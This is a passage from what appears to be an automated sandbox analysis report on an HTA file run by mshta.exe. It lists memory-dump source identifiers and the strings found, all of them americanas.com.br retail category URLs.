Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=pfm_home_automotivo_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435624253.0000000009C1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483197472.0000000006F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/bebes?chave=pfm_home_bebes_menu
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosc
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menu
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menu7;
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/bonecas/rebornjZ
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/lego/vf
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menug
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487177460.000000000AB31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404256581.000000000AB22000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_cameba
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_cameba:
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436096053.0000000009C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429674983.0000000009C14000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=pfm_home_cameba_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=pfm_home_cameba_menug
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=pfm_home_cameba_menun
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC0E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cameras-e-drones?chave=pfm_home_cameras_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cameras-e-drones?chave=pfm_home_cameras_menuH
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437768581.0000000009C12000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/casa-e-construcao?chave=pfm_home_construcao_menu
Source: mshta.exe, 00000000.00000003.25392143865.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486282298.000000000A9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/casas.cSD
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483067845.0000000006EDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403097112.0000000006EDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459140045.0000000009476000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hm
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488396530.000000000AC56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459140045.0000000009476000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 